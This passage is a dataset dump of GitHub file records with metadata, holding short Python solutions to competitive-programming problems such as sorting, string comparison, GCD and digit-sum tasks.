0.5204081535339355, "alphanum_fraction": 0.5306122303009033, "avg_line_length": 13, "blob_id": "3d852d503d8a74af3d54e1d7ac4368649e917146", "content_id": "6710da5ebb60c7251584adc660d07ad9e76f2e38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/TSORT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\na=[0]*n\nfor i in range(n):\n a[i]=int(input())\na.sort()\nfor i in a:\n print(i)\n" }, { "alpha_fraction": 0.350943386554718, "alphanum_fraction": 0.40377357602119446, "avg_line_length": 25.5, "blob_id": "ffcac78b9c3a65555aa690a653c895dd33512d5b", "content_id": 
"7481d1507cb1cd5ac9e1053720f0a49dac6513c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 55, "num_lines": 10, "path": "/CHEFSTLT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s1=input()\n s2=input()\n mn,mx=0,len(s1)\n for i in range(len(s1)):\n if(s1[i]==s2[i] and s1[i]!='?'):\n mx-=1\n if(s1[i]!=s2[i] and s1[i]!='?' and s2[i]!='?'):\n mn+=1 \n print(mn,mx)\n" }, { "alpha_fraction": 0.4873417615890503, "alphanum_fraction": 0.49367088079452515, "avg_line_length": 18.75, "blob_id": "d35bb35b0faa69ef573bfe2ae6da7eaf4d4999c5", "content_id": "b4f4452f8f10967e9df62c5fd498d213e06d1ef8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/FANCY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input().split()\n i=\"not\"\n k=0\n if i in s:\n print(\"Real Fancy\")\n else:\n print(\"regularly fancy\")\n" }, { "alpha_fraction": 0.349152535200119, "alphanum_fraction": 0.3694915175437927, "avg_line_length": 18.66666603088379, "blob_id": "7335c674baa2c28b0215714e058e8d29c6bb8eb2", "content_id": "e456e80bc77d1e547e02e3825901629356916119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 29, "num_lines": 15, "path": "/CHEALG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n st=\"\"\n c=1\n for i in range(len(s)-1):\n if(s[i]==s[i+1]):\n c+=1\n else:\n st+=s[i]+str(c)\n c=1\n st+=s[len(s)-1]+str(c)\n if(len(st)<len(s)):\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 
0.47345131635665894, "alphanum_fraction": 0.48672565817832947, "avg_line_length": 21.600000381469727, "blob_id": "7ca6b99ee7d004964af4f228eac6fc734a197ad1", "content_id": "68f243ddf868fa639930bcd6d1ca39281c92c704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/RECIPE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n p=[int(i) for i in input().split()]\n n=p.pop(0)\n a=p[0]\n for i in range(1,n):\n a=math.gcd(a,p[i])\n for i in range(n):\n print(p[i]//a,end=\" \")\n print()\n" }, { "alpha_fraction": 0.38686132431030273, "alphanum_fraction": 0.43065693974494934, "avg_line_length": 17.85714340209961, "blob_id": "996a9039dbbef12a7fa538849527ebf70e2a2051", "content_id": "7ee30a68842333ce77549807f27d285e789ebc85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/FLOW006.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=int(input())\n s=0\n while(a>0):\n s+=int(a%10)\n a=int(a/10)\n print(int(s))\n \n" }, { "alpha_fraction": 0.35093167424201965, "alphanum_fraction": 0.39751553535461426, "avg_line_length": 20.46666717529297, "blob_id": "8648c2e84af60785f7547f1229e230a580aa55cc", "content_id": "cd243095ce3e9fd492e1994baae9fe5dac796af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/COPS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n m,x,y=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n d=x*y\n 
s=[0]*100\n for i in a:\n p=i-d\n q=i+d\n if p<1:\n p=1\n if q>100:\n q=100\n for j in range(p-1,q):\n s[j]=1\n print(s.count(0))\n" }, { "alpha_fraction": 0.402402400970459, "alphanum_fraction": 0.41741740703582764, "avg_line_length": 16.526315689086914, "blob_id": "aa1702b2e166bb3c630a2915e1ac297271e296fc", "content_id": "8a6e44a5cd7c98a1604b5661097d1f7ca875f837", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 45, "num_lines": 19, "path": "/HMAPPY2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def gcd(a,b):\n while b > 0:\n a, b = b, a % b\n return a\n \ndef lcm(a, b):\n return a * b / gcd(a, b)\n\nfor _ in range(int(input())):\n n,a,b,k=[int(i) for i in input().split()]\n x,y,z=0,0,0\n p=lcm(a,b)\n x=n//a\n y=n//b\n z=n//p\n if(x+y-(2*z)>=k):\n print(\"Win\")\n else:\n print(\"Lose\")\n" }, { "alpha_fraction": 0.4113207459449768, "alphanum_fraction": 0.43018868565559387, "avg_line_length": 25.5, "blob_id": "7b2744e8100cc7ecf0796eb57782b1904ef6954c", "content_id": "42a620f9d4a88621419d23021d5daff0dcbb4e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/MAGICHF.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,x,s=[int(i) for i in input().split()]\n a=[0]*(n+1)\n a[x]=1\n for j in range(s):\n p,q=[int(i) for i in input().split()]\n a[p],a[q]=a[q],a[p]\n for i in range(n+1):\n if(a[i]==1):\n print(i)\n" }, { "alpha_fraction": 0.5376344323158264, "alphanum_fraction": 0.5376344323158264, "avg_line_length": 30, "blob_id": "2f1ec5376c9c5119071c62c73426a2ccb37375a6", "content_id": "8fa8bf6b9019835cc578e0f05a1f031e7a284cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/FLOW002.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range (int(input())):\n a,b=[int(i) for i in input().split()]\n print(int(a%b))\n" }, { "alpha_fraction": 0.40519481897354126, "alphanum_fraction": 0.4389610290527344, "avg_line_length": 21.647058486938477, "blob_id": "66e081844a171d1ed7b26c61ad90c35dde5398c4", "content_id": "9f794645c2a11a9ae660516daa1d1b786e8753fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "no_license", "max_line_length": 45, "num_lines": 17, "path": "/ENTEXAM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k,e,m=[int(i) for i in input().split()]\n a=[0]*(n)\n b=[0]*e\n for i in range(n):\n b[e-1]=0\n b=[int(i) for i in input().split()]\n a[i]=sum(b)\n p=a[n-1]\n a.sort(reverse=True)\n q=a[k-1]\n if(q-p+1<=m and q-p+1>0):\n print(q-p+1)\n elif(q-p+1<=0):\n print(\"0\")\n else:\n print(\"Impossible\")\n" }, { "alpha_fraction": 0.3041749596595764, "alphanum_fraction": 0.32405567169189453, "avg_line_length": 24.149999618530273, "blob_id": "eb786fa5138b1e3a104b63690490fcb972dd50ac", "content_id": "a0fb0b9bd48e9d2b13aaa4aec132974509934776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 503, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/VALIDSTK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n arr = [int(i) for i in input().split()]\n if len(arr) == n:\n count = 0\n k = 0\n i = 0\n for i in range(len(arr)):\n if arr[i] == 1:\n count+=1\n elif arr[i] == 0:\n if count == 0:\n k = 1\n break\n else:\n count-=1\n if k == 1:\n 
print(\"Invalid\")\n else:\n print(\"Valid\")\n" }, { "alpha_fraction": 0.4356846511363983, "alphanum_fraction": 0.43983402848243713, "avg_line_length": 20.909090042114258, "blob_id": "23284d28b6f8782107a669fcbf6ab9e9847a8942", "content_id": "2e1fabddc47f85cc55576c304ad3954e36bbcc69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 41, "num_lines": 11, "path": "/PRICECON.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n p=[int(i) for i in input().split()]\n rev=sum(p)\n amt=0\n for i in p:\n if(i>k):\n amt+=k\n else:\n amt+=i\n print(rev-amt)\n" }, { "alpha_fraction": 0.3614457845687866, "alphanum_fraction": 0.3734939694404602, "avg_line_length": 19.75, "blob_id": "923b647fc1f7cd0262583e1006a8242a1f3ded05", "content_id": "f8b33e685a9f091b2215215dc0626967a040aa52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 249, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/TWOSTR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x=input()\n y=input()\n p=-1\n for i in range(len(x)):\n if((x[i]!=y[i]) and (x[i]!='?' 
and y[i]!='?')):\n p=0\n break\n if(p==-1):\n print(\"Yes\")\n else:\n print(\"No\")\n" }, { "alpha_fraction": 0.28260868787765503, "alphanum_fraction": 0.33695653080940247, "avg_line_length": 18.714284896850586, "blob_id": "40633a4426025e0951ff56b0ef3b1f18ee0a8a78", "content_id": "8d078ab400b69915304654efd090f78154bf92bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 32, "num_lines": 14, "path": "/LONGSEQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=input()\n a=[0,0]\n for i in n:\n if(i=='0'):\n a[0]+=1\n else:\n a[1]+=1\n if(a[0]>=2 and a[1]>=2):\n break\n if(a[0]==1 or a[1]==1):\n print(\"Yes\")\n else:\n print(\"No\")\n" }, { "alpha_fraction": 0.36082473397254944, "alphanum_fraction": 0.39175257086753845, "avg_line_length": 19.55555534362793, "blob_id": "9b93ccf1ea9c6bf798dd5a0f6e05d8984519cc02", "content_id": "840b85260d551b8442ea66092bdf0e789a42fe92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/CHEFWARS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n h,p=[int(i) for i in input().split()]\n while(p>0 and h>0):\n h-=p\n p//=2\n if(h<=0):\n print(\"1\")\n else:\n print(\"0\")\n \n" }, { "alpha_fraction": 0.2931937277317047, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 22.875, "blob_id": "9988bb9c4150c84918280eddecee301ad07338fc", "content_id": "bf570da509a17cf7b5fe479195ece1d476800675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, "license_type": "no_license", "max_line_length": 56, "num_lines": 24, "path": "/GIFTSRC.py", "repo_name": "k0malSharma/Competitive-programming", 
"src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n x,y=0,0\n for i in range(1,n,1):\n if(s[i]=='L' and s[i-1]!='L' and s[i-1]!='R'):\n x-=1\n elif(s[i]=='R' and s[i-1]!='L' and s[i-1]!='R'):\n x+=1\n elif(s[i]=='U' and s[i-1]!='U' and s[i-1]!='D'):\n y+=1\n elif(s[i]=='D' and s[i-1]!='U' and s[i-1]!='D'):\n y-=1\n else:\n continue\n if(s[0]=='L'):\n x-=1\n elif(s[0]=='R'):\n x+=1\n elif(s[0]=='U'):\n y+=1\n else:\n y-=1\n print(x,\" \",y)\n" }, { "alpha_fraction": 0.3473389446735382, "alphanum_fraction": 0.36974790692329407, "avg_line_length": 35.33333206176758, "blob_id": "d242e136ccf1dc94f57374beb8e682be3f4a19a7", "content_id": "b1ceeea36e1d2f48497864526d83b3883f6d9c91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 99, "num_lines": 9, "path": "/CV.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n flag=0\n for i in range(n):\n if ((s[i]!='a' and s[i]!='e' and s[i]!='i' and s[i]!='o' and s[i]!='u') and i <= len(s)-2):\n if (s[i+1]=='a' or s[i+1]=='e' or s[i+1]=='i' or s[i+1]=='o' or s[i+1]=='u'):\n flag+=1\n print(flag) \n \n \n" }, { "alpha_fraction": 0.37003058195114136, "alphanum_fraction": 0.40366971492767334, "avg_line_length": 20.799999237060547, "blob_id": "48de3a31c5074fdb548aa5d2356969e68ef5f696", "content_id": "3435e2a1780bca4cda6f2c17b8b30988deeb16f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CENS20D.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=[]\n c=0\n for i in range(1,n+1):\n for j in range(i+1,n+1):\n 
b.append([i,j])\n \n for i in range(len(b)):\n x=b[i][0]\n y=b[i][1]\n if a[x-1]&a[y-1]==a[x-1]:\n c=c+1\n print(c)\n" }, { "alpha_fraction": 0.4292929172515869, "alphanum_fraction": 0.43939393758773804, "avg_line_length": 23.75, "blob_id": "185bdcd4e924109d865fec17094e906fff7cc661", "content_id": "e772dded983369327c27abaf25005aca2911c5b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/ICM2008.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a, b, c, d = (int(i) for i in input().split())\n m = abs(a-b)\n n = abs(c-d)\n if m==n or n!=0 and m%n==0:\n print('YES')\n else:\n print('NO')\n" }, { "alpha_fraction": 0.38314175605773926, "alphanum_fraction": 0.40229883790016174, "avg_line_length": 19.076923370361328, "blob_id": "916b1223605591c445bef3f270421c69c6350e71", "content_id": "c1b7c6e584dc1fdeb084aa261b109dfc161baa0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/CEQUAL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n a.sort()\n k=0\n for i in range(n-1):\n if(a[i]==a[i+1]):\n k+=1\n break\n if(k==1):\n print(\"Yes\")\n else:\n print(\"No\")\n" }, { "alpha_fraction": 0.4359999895095825, "alphanum_fraction": 0.4359999895095825, "avg_line_length": 23.200000762939453, "blob_id": "5e467335e1d43c4eb450c5604987e2744806bf15", "content_id": "df2ad5f1406f10180180f7eb4ea3195da16780c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/RECTANGL.py", 
"repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for i in range(int(input())):\n a,b,c,d=[int(i) for i in input().split()]\n if(a==b and c==d):\n print(\"YES\")\n elif(a==c and b==d):\n print(\"YES\")\n elif(a==d and b==c):\n print(\"YES\")\n else:\n print(\"NO\")\n \n" }, { "alpha_fraction": 0.4205128252506256, "alphanum_fraction": 0.47179487347602844, "avg_line_length": 20.66666603088379, "blob_id": "1fa6ef18b4776e1ccc077e3aa9f631c1975af5ab", "content_id": "9418c5efb76941aedaeb8cd1bc8e5192b4a172b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 195, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/PCJ18C.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nt=int(input())\nwhile(t!=0):\n n,a,k=map(int,input().split())\n q=n*(n-1)\n p=(((n-2)*360-(2*a*n))*(k-1))+(a*q)\n x=math.gcd(p,n*(n-1))\n print(int(p/x), int(q/x))\n t=t-1\n" }, { "alpha_fraction": 0.34560906887054443, "alphanum_fraction": 0.3597733676433563, "avg_line_length": 22.53333282470703, "blob_id": "20818c6a7fa7d8087892ee0449f1b38bfd7f02c6", "content_id": "4a538c440c904937e0acc6685622c53332bbcb7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 42, "num_lines": 15, "path": "/CHEFARRP.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n a = [int(i) for i in input().split()]\n count = 0\n for i in range(n):\n for j in range(i+1, n+1):\n sub = a[i:j]\n s = sum(sub)\n p = 1\n for k in sub:\n p*= k\n if s == p:\n count += 1\n \n print(count)\n" }, { "alpha_fraction": 0.2953367829322815, "alphanum_fraction": 0.3575129508972168, "avg_line_length": 18.299999237060547, "blob_id": "6518415437d34ec80e19cb14d7dfa20ebe2870e6", "content_id": 
"5d03ee0e413d29a8fedc9396255c074ee35d0ec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 29, "num_lines": 10, "path": "/TWOVSTEN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x=int(input())\n if(x%5==0 or x%10==0):\n k=0\n while(x%10!=0):\n x*=2\n k+=1\n print(k)\n else:\n print(\"-1\")\n" }, { "alpha_fraction": 0.3789868652820587, "alphanum_fraction": 0.399624764919281, "avg_line_length": 21.20833396911621, "blob_id": "d5c51e1743c6e57b2c08c75faeeffc674493b40d", "content_id": "a3b5d43e094ea20549dfa2880387888566613f01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 533, "license_type": "no_license", "max_line_length": 43, "num_lines": 24, "path": "/ZUBREACH.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for t in range(int(input())):\n m,n=[int(i) for i in input().split()]\n rx,ry=[int(i) for i in input().split()]\n l=int(input())\n s=input()\n l,u,d,r=0,0,0,0\n for i in s:\n if(i=='L'):\n l+=1\n elif(i=='U'):\n u+=1\n elif(i=='R'):\n r+=1\n else:\n d+=1\n x=r-l\n y=u-d\n print(\"Case\",t+1,end=\"\")\n if(x==rx and y==ry):\n print(\": REACHED\")\n elif(x<0 or x>m or y<0 or y>n):\n print(\": DANGER\")\n else:\n print(\": SOMEWHERE\")\n" }, { "alpha_fraction": 0.43103447556495667, "alphanum_fraction": 0.4482758641242981, "avg_line_length": 28, "blob_id": "f88614030ec3f8391cf15b4eec14d13dd18a78e3", "content_id": "ba63507addc5c025e0f1319ec54fe374ebfaba98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 43, "num_lines": 6, "path": "/THREEFR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n 
x,y,z=[int(i) for i in input().split()]\n if x+y-z==0 or x+z-y==0 or z+y-x==0:\n print('yes')\n else:\n print('no')\n" }, { "alpha_fraction": 0.3968871533870697, "alphanum_fraction": 0.42023345828056335, "avg_line_length": 19.08333396911621, "blob_id": "cba9beea1af7525a57866b94da2cf25479b5a93f", "content_id": "dc0c042a0aef7009a5cc2f0e1e60cd5e7ca901be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 257, "license_type": "no_license", "max_line_length": 42, "num_lines": 12, "path": "/PRB01.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n flag=0\n for i in range(2,int(math.sqrt(n))+1):\n if(n%i==0):\n flag+=1\n break\n if(flag==0):\n print(\"yes\")\n else:\n print(\"no\")\n \n" }, { "alpha_fraction": 0.3858267664909363, "alphanum_fraction": 0.4094488322734833, "avg_line_length": 20.399999618530273, "blob_id": "73f61b4e6280547b7feb7d0f644b4f41058de6f7", "content_id": "0d1743395fe332b5b0c53a8e00c61f4832e40338", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/FCTRL2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x=1\n for i in range(1,int(input())+1):\n x*=i\n print(int(x))\n \n" }, { "alpha_fraction": 0.38866397738456726, "alphanum_fraction": 0.4736842215061188, "avg_line_length": 19.08333396911621, "blob_id": "8a2d8cc70a7cbd0fa995a98aef4f5922b8c30e82", "content_id": "8f6636b8b4c2030ab1cb589c76263c1db26b7347", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 247, "license_type": "no_license", "max_line_length": 52, "num_lines": 12, "path": "/CHEFRUN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": 
"for _ in range(int(input())):\n x1,x2,x3,v1,v2=[int(i) for i in input().split()]\n d1=x3-x1\n d2=x2-x3\n t1=d1/v1\n t2=d2/v2\n if t1<t2:\n print(\"Chef\")\n elif t1>t2:\n print(\"Kefa\")\n else:\n print(\"Draw\")\n \n" }, { "alpha_fraction": 0.49597856402397156, "alphanum_fraction": 0.49865952134132385, "avg_line_length": 23.866666793823242, "blob_id": "751db57746385147eee52a86d1db3c3917e17bfd", "content_id": "b3510d0944171039f27f7c1ac886ac5c6baf704c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/MODEFREQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n a.sort()\n b=list(dict.fromkeys(a))\n c=[0]*len(b)\n for i in range(len(b)):\n c[i]=a.count(b[i])\n c.sort()\n d=list(dict.fromkeys(c))\n e=[]\n for i in range(len(d)):\n e.append(c.count(d[i]))\n m=e.index(max(e))\n print(d[m])\n" }, { "alpha_fraction": 0.460317462682724, "alphanum_fraction": 0.5661375522613525, "avg_line_length": 26, "blob_id": "ddb353f17514da72bda41e3cf0f39c844317aaf4", "content_id": "260fd99d70680f91256686e92a12b19d1704ef72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/SNCKYEAR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "year_conducted = [2010, 2015, 2016, 2017, 2019]\nfor _ in range(int(input())):\n n = int(input())\n if n in year_conducted:\n print(\"HOSTED\")\n else:\n print(\"NOT HOSTED\")\n" }, { "alpha_fraction": 0.3910256326198578, "alphanum_fraction": 0.4743589758872986, "avg_line_length": 13.181818008422852, "blob_id": "4ce8d382ea0f1fc0620e7035a06e62d3eeb4570c", "content_id": 
"1f08869f425bb4834a4d559a22156a931dee78e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/REDONE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "m=10**9+7\nz=10**6+1\nl=[0]*z\nl[1]=1\nx=1\nfor i in range(2,z):\n x=(x+i+(x*i))%m\n l[i]=x\nfor _ in range(int(input())):\n n=int(input())\n print(l[n])\n" }, { "alpha_fraction": 0.36486485600471497, "alphanum_fraction": 0.36936935782432556, "avg_line_length": 16.75, "blob_id": "83df5b568ca4668b10921925589fe33a964bbc45", "content_id": "faca549cc4b5dc8514606db320fcb3ea9b996ee6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 222, "license_type": "no_license", "max_line_length": 29, "num_lines": 12, "path": "/ALPHABET.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "s=input()\nfor t in range(int(input())):\n a=input()\n x=-1\n for i in a:\n if i in s:\n continue \n else:\n print(\"No\")\n break\n else:\n print(\"Yes\")\n \n" }, { "alpha_fraction": 0.2781065106391907, "alphanum_fraction": 0.3254437744617462, "avg_line_length": 20.125, "blob_id": "82b24d4e97c437bea27db0c2a93f3b57a56816a1", "content_id": "f0395fa81ff9442fda764abf4a38383ba49de5e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/PRFXGD.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n k,x=[int(i) for i in input().split()]\n l=[0]*26\n p=0\n for i in s:\n l[ord(i)-97]+=1\n if (l[ord(i)-97]>x):\n if(k>0):\n l[ord(i)-97]-=1\n k-=1\n p-=1\n else:\n break;\n p+=1\n print(p)\n" }, { "alpha_fraction": 0.42016807198524475, "alphanum_fraction": 
0.48739495873451233, "avg_line_length": 16, "blob_id": "e44f97fce6747c6a4975ba7c21ee5d9a97b47ada", "content_id": "f90bd0da78689ec017cc071beda6b714f6a0efe0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 27, "num_lines": 7, "path": "/HS08TEST.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "a,b=input().split()\na=int(a)\nb=float(b)\nif((a+0.5)>b or a%5!=0):\n print(\"%.2f\"%b)\nelse:\n print(\"%.2f\"%(b-a-0.5))\n" }, { "alpha_fraction": 0.4628571569919586, "alphanum_fraction": 0.46857142448425293, "avg_line_length": 27.33333396911621, "blob_id": "08d9d669ccf12efaca1e9917a44506ec10bfdfdb", "content_id": "27882f077e26386cb1b53c1290f7978ca3e70483", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/CHSERVE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n chef, cook, k = [int(i) for i in input().split()]\n if (chef+cook) % (2*k) < k:\n print(\"CHEF\")\n else:\n print(\"COOK\")\n \n" }, { "alpha_fraction": 0.5244755148887634, "alphanum_fraction": 0.5524475574493408, "avg_line_length": 22.83333396911621, "blob_id": "f80a1ae1e6c649368ed54f84a0f559c2c10fe0cd", "content_id": "418f5aa2f6199b9bc5025d79d14ecc7304fd85dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 42, "num_lines": 6, "path": "/QUADROOT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\na=int(input())\nb=int(input())\nc=int(input())\nprint((-b+math.sqrt((b*b)-(4*a*c)))/(2*a))\nprint((-b-math.sqrt((b*b)-(4*a*c)))/(2*a))\n" }, { "alpha_fraction": 0.4909090995788574, "alphanum_fraction": 
0.49696969985961914, "avg_line_length": 11.538461685180664, "blob_id": "c827c9ce7a375e8036f54e8f81d0d8a583de8a34", "content_id": "be73ca989984b4228ebe4bedda332bdf1ad58e3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 165, "license_type": "no_license", "max_line_length": 17, "num_lines": 13, "path": "/AREAPERI.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "l=int(input())\nb=int(input())\na=l*b\np=2*(l+b)\nif(a>p):\n print(\"Area\")\n print(a)\nelif(p>a):\n print(\"Peri\")\n print(p)\nelse:\n print(\"Eq\")\n print(a)\n \n" }, { "alpha_fraction": 0.39747634530067444, "alphanum_fraction": 0.42902207374572754, "avg_line_length": 23, "blob_id": "f1ed8ae82e0a45502c8dfcabefcdc36cd35b65bd", "content_id": "12477c50be7396da03e424e21b688dbe48b66759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "no_license", "max_line_length": 55, "num_lines": 13, "path": "/ISITCAKE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": 